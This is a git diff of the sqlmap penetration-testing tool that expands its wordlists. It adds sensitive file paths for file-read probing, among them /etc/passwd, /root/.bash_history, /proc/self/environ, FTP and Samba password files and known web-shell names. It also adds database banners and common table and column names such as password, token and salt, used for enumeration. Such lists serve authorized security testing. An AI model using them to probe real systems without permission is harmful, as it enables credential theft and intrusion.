+/usr/local/pgsql/bin/pg_passwd +/usr/local/pgsql/data/passwd +/usr/pkgsrc/net/pureftpd/pureftpd.passwd +/usr/ports/contrib/pure-ftpd/pureftpd.passwd +/usr/ports/ftp/pure-ftpd/pureftpd.passwd +/usr/ports/net/pure-ftpd/pureftpd.passwd +/var/log/exim_rejectlog/etc/passwd +/etc/mysql/conf.d/old_passwords.cnf +/etc/password.master +/var/www/.lighttpdpassword +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/opt/apache2/conf/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.default + +# Reference: https://pastebin.com/KgPsDXjg + +/etc/passwd +/etc/crontab +/etc/hosts +/etc/my.cnf +/etc/.htpasswd +/root/.bash_history +/etc/named.conf +/proc/self/environ +/etc/php.ini +/bin/php.ini +/etc/httpd/php.ini +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/local/etc/php.ini +/usr/local/lib/php.ini +/usr/local/php/lib/php.ini +/usr/local/php4/lib/php.ini +/usr/local/php5/lib/php.ini +/usr/local/apache/conf/php.ini +/etc/php4.4/fcgi/php.ini +/etc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/apache2/php.ini +/etc/php/7.4/apache2/php.ini +/etc/php/php.ini +/usr/local/apache/conf/modsec.conf +/var/cpanel/cpanel.config +/proc/self/environ +/proc/self/fd/2 +/etc/ssh/sshd_config +/var/lib/mysql/my.cnf +/etc/mysql/my.cnf +/etc/my.cnf +/etc/logrotate.d/proftpd +/www/logs/proftpd.system.log +/var/log/proftpd +/etc/proftp.conf +/etc/protpd/proftpd.conf +/etc/vhcs2/proftpd/proftpd.conf +/etc/proftpd/modules.conf +/etc/vsftpd.chroot_list +/etc/vsftpd/vsftpd.conf +/etc/vsftpd.conf +/etc/chrootUsers +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/usr/sbin/pure-config.pl +/usr/etc/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.conf +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/pureftpd/etc/pureftpd.pdb +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/pureftpd/etc/pure-ftpd.conf +/etc/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pureftpd.pdb +/etc/pureftpd.passwd +/etc/pure-ftpd/pureftpd.pdb +/var/log/ftp-proxy +/etc/logrotate.d/ftp +/etc/ftpchroot +/etc/ftphosts +/etc/smbpasswd +/etc/smb.conf +/etc/samba/smb.conf +/etc/samba/samba.conf +/etc/samba/smb.conf.user +/etc/samba/smbpasswd +/etc/samba/smbusers +/var/lib/pgsql/data/postgresql.conf +/var/postgresql/db/postgresql.conf +/etc/ipfw.conf +/etc/firewall.rules +/etc/ipfw.rules +/usr/local/etc/webmin/miniserv.conf +/etc/webmin/miniserv.conf +/usr/local/etc/webmin/miniserv.users +/etc/webmin/miniserv.users +/etc/squirrelmail/config/config.php +/etc/squirrelmail/config.php +/etc/httpd/conf.d/squirrelmail.conf +/usr/share/squirrelmail/config/config.php +/private/etc/squirrelmail/config/config.php +/srv/www/htdos/squirrelmail/config/config.php + +# Web shells + +/var/www/html/backdoor.php +/var/www/html/b374k.php +/var/www/html/c99.php +/var/www/html/cmd.php +/var/www/html/r57.php +/var/www/html/shell.php +/var/www/html/wso.php + +# Misc + +/app/app.js +/app/configure.js +/app/config/config.json +/etc/grafana/grafana.ini +/opt/kibana/config/kibana.yml +/etc/kibana/kibana.yml +/etc/elasticsearch/elasticsearch.yml diff --git a/txt/common-outputs.txt b/data/txt/common-outputs.txt similarity index 88% rename from txt/common-outputs.txt rename to data/txt/common-outputs.txt index 55770e2b278..bd5061b8bf7 100644 --- a/txt/common-outputs.txt +++ b/data/txt/common-outputs.txt @@ -1,5 +1,5 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission [Banners] @@ -11,32 +11,84 @@ 5.0. 5.1. 5.5. +5.6. +5.7. 6.0. +8.0. +8.1. +8.2. +8.3. +8.4. +9.0. +9.1. +9.2. +9.3. # PostgreSQL +PostgreSQL 7.0 +PostgreSQL 7.1 +PostgreSQL 7.2 PostgreSQL 7.3 PostgreSQL 7.4 +PostgreSQL 8.0 PostgreSQL 8.1 PostgreSQL 8.2 PostgreSQL 8.3 PostgreSQL 8.4 +PostgreSQL 8.5 +PostgreSQL 9.0 +PostgreSQL 9.1 +PostgreSQL 9.2 +PostgreSQL 9.3 +PostgreSQL 9.4 +PostgreSQL 9.5 +PostgreSQL 9.6 +PostgreSQL 10. +PostgreSQL 11. +PostgreSQL 12. +PostgreSQL 13. +PostgreSQL 14. +PostgreSQL 15. +PostgreSQL 16. +PostgreSQL 17. # Oracle Oracle Database 9i Standard Edition Release +Oracle Database 9i Standard Edition Release 9. Oracle Database 9i Express Edition Release +Oracle Database 9i Express Edition Release 9. Oracle Database 9i Enterprise Edition Release +Oracle Database 9i Enterprise Edition Release 9. Oracle Database 10g Standard Edition Release +Oracle Database 10g Standard Edition Release 10. Oracle Database 10g Express Edition Release Oracle Database 10g Enterprise Edition Release +Oracle Database 10g Enterprise Edition Release 10. Oracle Database 11g Standard Edition Release +Oracle Database 11g Standard Edition Release 11. Oracle Database 11g Express Edition Release +Oracle Database 11g Express Edition Release 11. Oracle Database 11g Enterprise Edition Release +Oracle Database 11g Enterprise Edition Release 11. +Oracle Database 12c +Oracle Database 18c +Oracle Database 19c +Oracle Database 21c +Oracle Database 23ai +Oracle Database 26ai # Microsoft SQL Server Microsoft SQL Server 7.0 Microsoft SQL Server 2000 Microsoft SQL Server 2005 Microsoft SQL Server 2008 +Microsoft SQL Server 2012 +Microsoft SQL Server 2014 +Microsoft SQL Server 2016 +Microsoft SQL Server 2017 +Microsoft SQL Server 2019 +Microsoft SQL Server 2022 +Microsoft SQL Server 2025 [Users] @@ -366,6 +418,7 @@ XDBWEBSERVICES # MySQL information_schema +performance_schema mysql phpmyadmin @@ -386,6 +439,10 @@ ReportServer ReportServerTempDB tempdb +# Cloud Defaults +rdsadmin +innodb +azure_maintenance [Tables] @@ -454,6 +511,44 @@ pma_relation pma_table_coords pma_table_info +# Wordpress +wp_users +wp_posts +wp_comments +wp_options +wp_postmeta +wp_terms +wp_term_taxonomy +wp_term_relationships +wp_links +wp_commentmeta + +# WooCommerce +wp_woocommerce_sessions +wp_woocommerce_api_keys +wp_woocommerce_attribute_taxonomies + +# Magento +catalog_product_entity +sales_order +sales_order_item +customer_entity +quote + +# Drupal +node +users +field_data_body +field_revision_body +taxonomy_term_data +taxonomy_vocabulary + +# Joomla +joomla_users +joomla_content +joomla_categories +joomla_modules + # PostgreSQL pg_aggregate pg_am @@ -467,6 +562,8 @@ pg_cast pg_class pg_constraint pg_conversion +pg_cron_job +pg_cron_job_run_detail pg_database pg_depend pg_description @@ -488,6 +585,7 @@ pg_rewrite pg_shdepend pg_shdescription pg_statistic +pg_stat_statements pg_tablespace pg_trigger pg_ts_config @@ -1020,6 +1118,29 @@ vVendor WorkOrder WorkOrderRouting +# Common tables + +accounts +admin +audit +backup +config +configuration +customers +data +files +history +images +log +logs +members +messages +orders +products +settings +test +tokens +uploads [Columns] @@ -1160,3 +1281,52 @@ smallint text time timestamp + +# Common columns +active +address +admin +blocked +category_id +city +confirmed +country +created_at +created_on +customer_id +deleted +deleted_at +dob +email +enabled +first_name +flag +gender +hidden +is_active +is_deleted +is_published +last_name +locked +login +modified_on +name +order_id +password +phone +private +product_id +public +role +salt +state +status +timestamp +token +type +updated_at +user_id +username +visible +zip +zip_code diff --git a/txt/common-tables.txt b/data/txt/common-tables.txt similarity index 81% rename from txt/common-tables.txt rename to data/txt/common-tables.txt index 8d0eacae0bb..855593c6af3 100644 --- a/txt/common-tables.txt +++ b/data/txt/common-tables.txt @@ -1,5 +1,5 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission users customer @@ -218,32 +218,23 @@ delivery_quality queries identification friends -vcd_Screenshots PERSON course_section -vcd_PornCategories -pma_history jiveRemoteServerConf channels object chip_layout -osc_products_options_values_to_products_options login user_newtalk -vcd_MetaDataTypes entrants Device imageInfo developers -div_experiment items_template defaults osc_products -vcd_MetaData mucRoomProp -QRTZ_JOB_DETAILS settings -pma_bookmark DEPENDENT imageCategoryList islandIn @@ -254,7 +245,6 @@ wp_posts package mucRoom vendortax -vcd_Comments attrs config_seq company @@ -262,18 +252,13 @@ register checksum_results ENROLLMENT operation -primarytest -vcd_CoverTypes binaries COURSE_SECTION Students func enrollment -pma_table_coords readers action_element -vcd_VcdToPornstars -osc_categories_description friend_statuses Domain servers @@ -284,33 +269,26 @@ resources mixins sys_options_cats licenses -pma_relation SIGNON clients Apply -vcd_CoversAllowedOnMediatypes ThumbnailKeyword form_definition_text -vcd_Log system jiveOffline tickers BANNERDATA mucAffiliation -fk_test_has_pk rooms objectcache collection_item_count -div_stock_parent jiveRoster Volume lookup investigator math jivePrivate -vcd_UserWishList osc_manufacturers_info -primarytest2 PROFILE categories_posts Flight @@ -322,64 +300,44 @@ client cv_country_synonyms osc_categories interwiki -logtest archive members_networks -vcd_MovieCategories language_text UserType friend -div_annotation_type osc_products_description osc_products_to_categories -QRTZ_PAUSED_TRIGGER_GRPS article recentchanges -vcd_UserLoans media -vcd_SourceSites conducts sales CurrentUsers Country -vcd_IMDB -vcd_Borrowers querycache Publication Pilot -div_stock Regions DEPT_LOCATIONS -vcd_Users master_table -vcd_VcdToUsers funny_jokes jos_vm_payment_method -vcd_UserProperties osc_products_images specialty -pma_pdf_pages visits -div_allele_assay -vcd_MediaTypes ipblocks WidgetPrices -form_definition_version_text experiment Publisher control protocol_action jivePrivacyList -vcd_VcdToPornStudios subImageInfo plugin_sid message_statuses state GalleryThumb hitcounter -vcd_Pornstars -QRTZ_BLOB_TRIGGERS -div_generation jiveGroupProp ingredients community_item_count @@ -387,13 +345,9 @@ jiveExtComponentConf SEQUENCE Continent rights -div_statistic_type Path osc_manufacturers logging -colnametests -QRTZ_FIRED_TRIGGERS -div_locality sailors Description warehouse @@ -406,54 +360,41 @@ CUSTOMERS jiveProperty app_user keyboards -div_unit_of_measure categorylinks grants Action -div_trait -div_trait_uom WidgetReferences product_type developers_projects userAttribute -vcd_Sessions form_data_archive -vcd_PornStudios action_attribute Thumbnail jiveGroupUser computers -QRTZ_LOCKS -vcd_PropertiesToUser customertax sector networks columns_priv globals -div_obs_unit_sample Widgets TERM salgrade -div_passport -vcd_UserRoles mucMember imagelinks exchange Status WORKS_ON lines -booleantests -QRTZ_SIMPLE_TRIGGERS +testusers mobile_menu staff -vcd_VcdToPornCategories tblusers hashes partner Product personnel ads -vcd_Covers osc_specials Keyword supplier @@ -461,61 +402,45 @@ agent_specialty pokes profile_pictures oldimage -div_poly_type -osc_products_attributes_download -div_allele isMember -vcd_Images userImageRating detail_table osc_products_attributes -pma_table_info officer -div_obs_unit -vcd_Settings COURSE Time locatedOn medicalprocedure -fk_test_has_fk mergesWith author UserFieldsInfo Employee oe -QRTZ_TRIGGERS insurance SUPPLIER -div_aa_annotation song imageAttribute views_track extremes -vcd_VcdToSources jiveRosterGroups webcal_config phpbb_ranks triggers_template appVersions -vcd_RssFeeds DUMMY ROLE activity study_text osc_products_options City -QRTZ_SCHEDULER_STATE osc_reviews edge questions partof blobs -QRTZ_CRON_TRIGGERS tag userSession vcd -pma_column_info -auto_id_tests job site_stats mucConversationLog @@ -523,16 +448,12 @@ sequence madewith OperationStatus SPJ -turizmi_ge zutat_cocktail -DWE_Internal_WF_Attributes zipcodes insertids ChemList product_category -foreigntest2 hero -cmContentVersionDigitalAsset reports devel_logsql f_sequence @@ -541,7 +462,6 @@ ClassificationScheme ez_webstats_conf credential utilise -cmDigitalAsset ACL_table service_request_log feedback @@ -568,29 +488,21 @@ dtb_order files_config PropColumnMap result -pma_designer_coords triggers audittrail -f_attributedependencies -organization_type_package_map -DWE_Corr_Sets userlist backgroundJob_table sf_guard_user_permission my_lake -DWE_Corr_Tokens sampleData -qrtz_blob_triggers reciprocal_partnersites rss_categories ADMIN -site_map_ge Factory_Output geo_Estuary phpbb_themes forum ClientsTable -mushroom_trainset rating_track iplinks maxcodevento @@ -601,7 +513,6 @@ cmLanguage phpbb_points_config guava_sysmodules querycachetwo -soc_da_polit_ge BOOK_AUTHORS records reciprocal_config @@ -630,7 +541,6 @@ expression Simple_Response photoo photos -child_config_traffic_selector version_data allocation dtb_category_total_count @@ -646,7 +556,6 @@ webcal_view pagecontent Collection maxcodcurso -self_government_ge phpbb_user_group InstanceStringTable bldg_types @@ -655,10 +564,8 @@ mailaddresses section m_type configlist -cmRepositoryContentTypeDefinition trade Parameter -jforum_privmsgs tbl_works_categories help_category bkp_String @@ -673,11 +580,9 @@ vendor_seq guava_theme_modules dtb_pagelayout bookings -cmPublicationDetail writes writer distance -DWE_Resource_Attributes jforum_groups Polynomial river @@ -698,23 +603,14 @@ SchemaInfo WidgetDescriptions dtb_category_count sidebar -R1Weights -humanitaruli_ge -cmTransactionHistory facets jforum_roles -samedicino_ge -qrtz_job_listeners geo_Lake religion nuke_gallery_media_class cia DatabaseInfo -R2TF THOT_THEME -R1Length -cmContentRelation -S2ODTMAP enrolled liste_domaines DEMO_PROJECTS @@ -737,7 +633,6 @@ UM_ROLE_ATTRIBUTES SCALE maclinks books -DWE_Predecessors interactions graphs_items stars @@ -756,7 +651,6 @@ email CustomerCards mtb_zip Campus -R1Size hardware dtb_other_deliv pricegroup @@ -770,15 +664,10 @@ colour command audio egresado -aggtest transport -zusti_da_sabuneb_ge -div_scoring_tech_type -R2Weights schedule routers zips -DWE_Delay_Timers Descriptions software wh_der_children @@ -805,7 +694,6 @@ cmSiteNode nodes sbreciprocal_cats rss_read -DWE_Workflow_Documents bombing tblblogtrackbacks fragment @@ -822,7 +710,6 @@ dtb_kiyaku EmailAddress Sea powers -QRTZ_CALENDARS reserve LINEITEM project_user_xref @@ -834,7 +721,6 @@ user_rights tf_messages Class_Def_Table geo_lake -copytest tissue ligneDeFacture PZ_Data @@ -844,7 +730,6 @@ cmts photo dtb_bloc user_preferences -music_ge D_Abbreviation data_set_association site_location @@ -859,7 +744,6 @@ evidence files test intUsers -div_treatment tblblogentries cocktail_person cdv_curated_allele @@ -870,18 +754,15 @@ MetadataValue curso redirect accountuser -qrtz_cron_triggers StateType forum_user_stat Descriptions_Languages m_users_profile Booked_On -not_null_with_default_test tblblogroles organizations topic economy -DWE_Org_Resources Model maxcodcorreo RATING @@ -899,7 +780,6 @@ dtb_send_customer cart size pg_ts_cfgmap -LimitTest2 QUESTION DC_Data webcal_group_user @@ -912,7 +792,6 @@ document m_users_acct vendor_types fruit -DWE_Resources Service PART cell_line @@ -929,21 +808,17 @@ statuses webcal_user customurl THOT_YEAR -DWE_Subscriptions correo -kultura_ge Factory_Master inv_lines_seq certificates webcal_asst ostypes POINT_SET -R2IDF forum_flag bugs taxonomy UM_ROLES -div_synonym payer tf_log job_title @@ -952,7 +827,6 @@ wp_options forum_user_activity trackbacks wp_pod_fields -cmAvailableServiceBindingSiteNodeTypeDefinition translation cdv_passport_group User_ @@ -962,31 +836,24 @@ my_county zoph_people account_permissions ORDERLINES -ganatlebe_ge wp_term_relationships pictures product_font Departure -mushroom_test_results routerbenchmarks bkp_Item Channel_Data realtable -mushroom_NBC_class odetails user_type_link -eco_da_biz_ge belong ezin_users time_zone_transition ew_tabelle ezsearch_return_count_new -cmSystemUserRole m_users -div_accession_collecting Economy tbl_works_clients -qrtz_locks geo_Mountain dtb_category tmp @@ -995,10 +862,7 @@ geo_Desert dtb_payment forum_topic ezsearch_search_phrase_new -jforum_attach -sazog_urtiertoba_ge Equipment -iuridiuli_ge MetadataSchemaRegistry basePlusCommissionEmployees addresses @@ -1029,7 +893,6 @@ SpecificationLink videos sf_guard_remember_key employer -monitoringi_ge leases phpbb_smilies stats @@ -1040,32 +903,25 @@ line_items_seq ndb_binlog_index zoph_categories help_topic -div_treatment_uom transaction wp_links -DWE_Organizations -live_ge cdv_allele_curated_allele timeperiod item_master_seq GLI_profiles cv_countries -qrtz_scheduler_state journal tf_users mwuser stories dtb_table_comment -jforum_quota_limit Lake SQLDATES phpbb_search_wordmatch friend2 functions comboboxes -DWE_Max_Id std_item -foreigntest jiveVersion sf_guard_group Classification @@ -1082,13 +938,10 @@ webcal_entry_repeats room domain_info SALES -DWE_Tasks profession1 SUPPORT_INCIDENTS PERMISSION Defect -DWE_Task_Attributes -grandchild_test Desert KARTA UM_ROLE_PERMISSIONS @@ -1098,23 +951,19 @@ guava_themes alltypes webcal_view_user vrls_xref_country -R1TF subject continent D_Format dtb_recommend_products Linkdesc_table -qrtz_fired_triggers TelephoneNumber dtb_customer_mail_temp copyrights -jforum_extension_groups DEMO_ASSIGNMENTS guava_group_assignments jforum_extensions zutat ew_user -duptest alerts partsvendor jiveGroup @@ -1134,7 +983,6 @@ tblblogentriesrelated guava_packages GRouteDetail cdv_reason -nulltest membership bkp_RS_Servers vrls_listing_images @@ -1144,7 +992,6 @@ group ClassificationNode dtb_best_products cv_cropping_system -DWE_Workflows egresadoxidiomaxhabilidad locus_data dtb_order_temp @@ -1166,14 +1013,12 @@ dtb_csv_sql synchro_type langlinks genres_in_movies -qrtz_triggers Province answerOption wp_postmeta ERDESIGNER_VERSION_ID calendar cmEvent -ruletest forum_user SalesReps ew_gruppi @@ -1204,9 +1049,7 @@ genres field vertex FoundThumbs -qrtz_trigger_listeners reciprocal_links -DWE_Meta_Data Course idiomaxegresado ordreReparation @@ -1234,16 +1077,13 @@ Language mountain ad_locales ExtrinsicObject -R2Size geo_island derived_types snipe_gallery_cat -qrtz_job_details guava_roleviews production_wtype AccountXML1 wh_man_children -not_null_test product_colour_multi ike_configs intUseringroup @@ -1273,7 +1113,6 @@ PREFIX_order_return_state experimental_data_set DOCUMENT_FIELDS Scripts -mushroom_dataset desert Can_Fly synchro_element @@ -1283,7 +1122,6 @@ tblblogpages f_attributedefinition intGroups way_nodes -child_test THOT_TARGET MOMENT dtb_classcategory @@ -1294,7 +1132,6 @@ dtb_deliv webcal_categories Parts invoices -QRTZ_JOB_LISTENERS ANSWER tbl_categories yearend @@ -1315,7 +1152,6 @@ nuke_gallery_categories areas cmContentVersion checksum_history -mushroom_test_results_agg accessTable cameFromTable services_links @@ -1327,17 +1163,13 @@ adv lake tests Offices -qrtz_simple_triggers Editor -sazog_urtiertoba_ge2 wp_pod_pages Extlangs seq_gen rss_subscription Station_Comment -R1IDF jforum_config -cmServiceDefinitionAvailableServiceBinding geo_River facilities connectorlinks @@ -1351,25 +1183,20 @@ FORM_QUESTION history_str f_classtype endpoints -R2Length zoph_albums bkp_ItemPresentation tblblogcategories -div_taxonomy traffic_selectors FORM -qrtz_paused_trigger_grps creditcards people_reg country_partner jforum_users -array_test dtb_mail_history priorities relations combustiblebois slow_log -DWE_Resource_Roles WROTE flow pay_melodies @@ -1378,7 +1205,6 @@ variable_interest dtb_class ZENTRACK_VARFIELD catalogue -uplebata_dacva_ge wp_usermeta time_zone games @@ -1398,7 +1224,6 @@ cmContentTypeDefinition radacct peer_config_child_config cmAvailableServiceBinding -cmSiteNodeVersion Poles_Zeros ipmacassocs m_news @@ -1411,22 +1236,18 @@ ipassocs cmSystemUser phpbb_categories FoundLists -jforum_smilies channelitems lokal subcategory Languages jiveSASLAuthorized -DWE_WF_Attributes cocktail cust_order -mushroom_testset THOT_SOURCE product_font_multi presence UM_USERS jiveUser -cmSiteNodeTypeDefinition wp_comments dtb_bat_order_daily_hour jos_vm_category @@ -1437,8 +1258,6 @@ geo_river MonitorStatus pagelinks ways -DWE_Roles -jforum_vote_desc cities PREFIX_order_return_state_lang subscriber @@ -1458,14 +1277,12 @@ production_multiple page_log_exclusion furniture nuke_gallery_pictures -cmRepositoryLanguage oc os PREFIX_tab_lang lc_fields framework_email datasets -sporti_ge externallinks geo_desert politics @@ -1477,7 +1294,6 @@ m_with program combustible ezin_articles -pma_tracking help_keyword POSITION stars_in_movies @@ -1487,12 +1303,10 @@ dtb_mailtemplate DIM_TYPE cart_table D_Unit -array_probe macassocs changeTva UM_PERMISSIONS geo_Source -R1Sum cdv_marker nuke_gallery_template_types UM_USER_ATTRIBUTES @@ -1513,7 +1327,6 @@ transcache dtb_question_result rss_category profiling -QRTZ_TRIGGER_LISTENERS THOT_LANGUAGE cmContent Descriptions_Scripts @@ -1535,7 +1348,6 @@ po_seq salariedEmployees grp jforum_topics -defertest array_data most_recent_checksum m_earnings @@ -1543,13 +1355,10 @@ product_related dtb_baseinfo webcal_import_data federationApplicants -qrtz_calendars melodies jforum_forums sf_guard_group_permission sys_acl_matrix -R2ODTMAP -mushroom_NBC country_diseases dtb_order_detail sic @@ -1570,11 +1379,8 @@ jforum_categories site_climatic phpbb_points_values zoph_color_schemes -DWE_Internal_Task_Attributes -uniquetest TypeRule dtb_customer -R2Sum PREFIX_customer_group ProjectsTable dtb_products @@ -1583,13 +1389,11 @@ dtb_question UM_USER_PERMISSIONS exam commande -viktorina_ge dtb_products_class subscribe page_restrictions querycache_info cdv_map_feature -oidtest Link_table guava_users connectormacassocs @@ -1615,8 +1419,12 @@ SPACE geo_Sea DATA_ORG Contributor +wallet +balance +flag # Various Joomla tables + jos_vm_product_download jos_vm_coupons jos_vm_product_reviews @@ -1642,9 +1450,6 @@ jos_vm_zone_shipping jos_bannertrack jos_vm_order_status jos_modules_menu -jos_vm_product_type -jos_vm_product_type_parameter -jos_vm_tax_rate jos_core_log_items jos_modules jos_users @@ -1710,6 +1515,7 @@ publicusers cmsusers # List provided by Anastasios Monachos (anastasiosm@gmail.com) + blacklist cost moves @@ -1761,6 +1567,7 @@ TBLCORPUSERS TBLCORPORATEUSERS # List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py) + tbladmins sort _wfspro_admin @@ -1820,6 +1627,7 @@ jos_comprofiler_members jos_joomblog_users jos_moschat_users knews_lostpass +korisnik korisnici kpro_adminlogs kpro_user @@ -1964,7 +1772,6 @@ JamPass MyTicketek MyTicketekArchive News -Passwords by usage count PerfPassword PerfPasswordAllSelected Promotion @@ -1988,12 +1795,10 @@ sysconstraints syssegments tblRestrictedPasswords tblRestrictedShows -Ticket System Acc Numbers TimeDiff Titles ToPacmail1 ToPacmail2 -Total Members UserPreferences uvw_Category uvw_Pref @@ -2002,7 +1807,6 @@ Venue venues VenuesNew X_3945 -stone list tblArtistCategory tblArtists tblConfigs @@ -2038,7 +1842,6 @@ bulletin cc_info login_name admuserinfo -userlistuser_list SiteLogin Site_Login UserAdmin @@ -2047,6 +1850,7 @@ Login Logins # List from http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html + account accnts accnt @@ -2116,6 +1920,7 @@ user_pwd user_passwd # List from hyrax (http://sla.ckers.org/forum/read.php?16,36047) + wsop Admin Config @@ -2208,6 +2013,7 @@ admin_pwd admin_pass adminpassword admin_password +admin_passwords usrpass usr_pass pass @@ -2258,7 +2064,6 @@ upload uploads file akhbar -sb_host_admin Firma contenu Kontakt @@ -2319,8 +2124,6 @@ pw pwd1 jhu webapps -ASP -Microsoft sing singup singin @@ -2340,11 +2143,6 @@ systime Tisch Tabellen Titel -u -u_n -u_name -u_p -u_pass Benutzer user_pw Benutzerliste @@ -2355,7 +2153,6 @@ Benutzername Benutzernamen vip Webbenutzer -sb_host_adminActiveDataFeed Kategorie Land Suchoptionen @@ -2366,7 +2163,6 @@ Umfrage TotalMembers Veranstaltungsort Veranstaltungsorte -Ansicht1 utilisateur trier compte @@ -2412,33 +2208,13 @@ Sujets Sondage Titres Lieux -Affichage1Affichage1edu -win -pc -windows -mac -edu -bayviewpath -bayview server -slserver -ColdFusion8 -ColdFusion -Cold -Fusion8 -Fusion ststaff -sb_host_adminAffichage1 -Affichage1 yhm yhmm -Affichage1name -sb_host_adminAffichage1name - -# site:jp -TypesTab # site:it + utenti categorie attivita @@ -2446,140 +2222,66 @@ comuni discipline Clienti gws_news -SGA_XPLAN_TPL_V$SQL_PLAN emu_services nlconfig -oil_bfsurvey_pro -oil_users -oil_menu_types -oil_polls Accounts -oil_core_log_searches -SGA_XPLAN_TPL_V$SQL_PLAN_SALL -oil_phocadownload_categories gws_page -oil_bfsurveypro_choices -oil_poll_data -oil_poll_date argomento -oil_modules ruolo -oil_contact_details emu_profiles user_connection -oil_poll_menu jos_jf_tableinfo -oil_templates_menu -oil_messages_cfg -oil_biolmed_entity_types -oil_phocagallery_votes -oil_core_acl_aro regioni -oil_modules_menu dati gws_admin -oil_phocagallery_user_category articoli -oil_content_frontpage cron_send -oil_biolmed_measures comune -SGA_XPLAN_TPL_DBA_TABLES esame -oil_session -oil_phocadownload_licenses -oil_weblinks -oil_messages -oil_phocagallery_votes_statistics dcerpcbinds -oil_jf_content -SGA_XPLAN_TPL_DBA_CONS_COLUMNS -SGA_XPLAN_TPL_DBA_IND_COLUMNS gruppi Articoli gws_banner gws_category soraldo_ele_tipo db_version -SGA_XPLAN_TPL_DBA_TAB_COLS -oil_biolmed_thesis jos_languages mlmail -SGA_XPLAN_TPL_V$SQLTEXT_NL -oil_bannertrack -oil_core_log_items -oil_rokversions -oil_bfsurveypro_34 -oil_bfsurveypro_35 -oil_google_destinations gws_product -oil_jf_tableinfo -oil_phocadownload -oil_biolmed_blocks -oil_bfsurvey_pro_example -oil_bfsurvey_pro_categories -oil_bannerclient -oil_core_acl_aro_sections -SGA_XPLAN_TPL_V$SQL -oil_biolmed_land connections not_sent_mails -sga_xplan_test -oil_languages utente documento gws_purchase -oil_plugins -oil_phocagallery -oil_menu -oil_biolmed_measures_by_entity_types offers anagrafica gws_text -oil_groups -oil_content_rating sent_mails -oil_banner -oil_google gws_jobs eventi mlattach -oil_migration_backlinks -oil_phocagallery_categories downloads mlgroup -oil_sections decodifica_tabelle -oil_phocagallery_img_votes -oil_phocagallery_img_votes_statistics -oil_dbcache -oil_content p0fs -oil_biolmed_entity -oil_rokdownloads -oil_core_acl_groups_aro_map gws_client decodifica_campi -oil_phocagallery_comments -oil_categories -oil_newsfeeds -oil_biolmed_measurements -oil_phocadownload_user_stat -oil_core_acl_aro_groups -SGA_XPLAN_TPL_V$SQL_PLAN_STAT -oil_core_acl_aro_map dcerpcrequests -oil_phocadownload_sections -oil_components discipline_utenti jos_jf_content -oil_phocadownload_settings -SGA_XPLAN_TPL_DBA_CONSTRAINTS -oil_biolmed_technician -oil_stats_agents -SGA_XPLAN_TPL_DBA_INDEXES # site:fr + +facture +factures +devis +commande +bon_commande +bon_livraison +fournisseur +panier +paiement +reglement Avion departement Compagnie @@ -2750,137 +2452,57 @@ spip_ortho_dico spip_caches # site:ru + +spravochnik +nomenklatura +dokument +zakaz +ostatki +kontragenty +klient +uslugi +provodki +obrabotka +sklad +zhurnal guestbook -binn_forum_settings -binn_forms_templ -binn_catprops currency -binn_imagelib -binn_news phpshop_opros_categories -binn_articles_messages -binn_cache -binn_bann_temps -binn_forum_threads voting -binn_update terms -binn_site_users_rights -binn_vote_options -binn_texts -binn_forum_temps -binn_order_temps -binn_basket -binn_order -binn_system_log -binn_vote_results -binn_articles phpshop_categories -binn_maillist_temps -binn_system_messages -binn_articles_temps -binn_search_temps banners -binn_imagelib_templ -binn_faq -binn_bann phpshop_news -binn_menu_templ -binn_maillist_settings -binn_docs_temps -binn_bann_restricted phpshop_system -binn_calendar_temps -binn_forum_posts -binn_cform_settings phpshop_baners phpshop_menu -binn_forms_fields -binn_cform_list -binn_vote phpshop_links mapdata -binn_submit_timeout -binn_forum_themes_temps -binn_order_elems -binn_templates -binn_cform -binn_catalog_template -binn_ct_templ_elems -binn_template_elems -binn_rubrikator_tlevel -binn_settings -binn_pages -binn_users -binn_categs -binn_page_elems -binn_site_users_temps -binn_vote_temps -binn_rubrikator_temps -binn_faq_temps -binn_sprav setup_ -binn_basket_templ -binn_forum_maillist -binn_news_temps phpshop_users -binn_catlinks -binn_sprav_temps -binn_maillist_sent -binn_forms_templ_elems jubjub_errors -binn_maillist -binn_catrights -binn_docs -binn_bann_pages -binn_ct_templ -binn_menu -binn_user_rights -binn_cform_textarea -binn_catalog_fields vykachka -binn_menu_tlevel phpshop_opros -binn_form39 -binn_site_users -binn_path_temps order_item # site:de + tt_content kunde medien Mitarbeiter fe_users -dwp_wetter -dwp_popup voraussetzen -dwp_foto_pictures -dwp_karte_speisen -dwp_news_kat -dwp_structur -dwp_foto_album -dwp_karte_kat bestellung -dwp_content be_users Vorlesungen -dwp_content_pic -dwp_link_entries -dwp_ecard_album persons -dwp_buchung_hotel -dwp_link_kat -dwp_news_absatz Assistenten Professoren Studenten -dwp_ecard_pictures lieferant -dwp_bewertung mitarbeiter gruppe -dwp_news_head wp_post2cat phpbb_forum_prune crops @@ -2910,7 +2532,6 @@ shop_settings tutorial motd_coding artikel_variationsgruppen -dwp_kontakt papers gesuche zahlung_weitere @@ 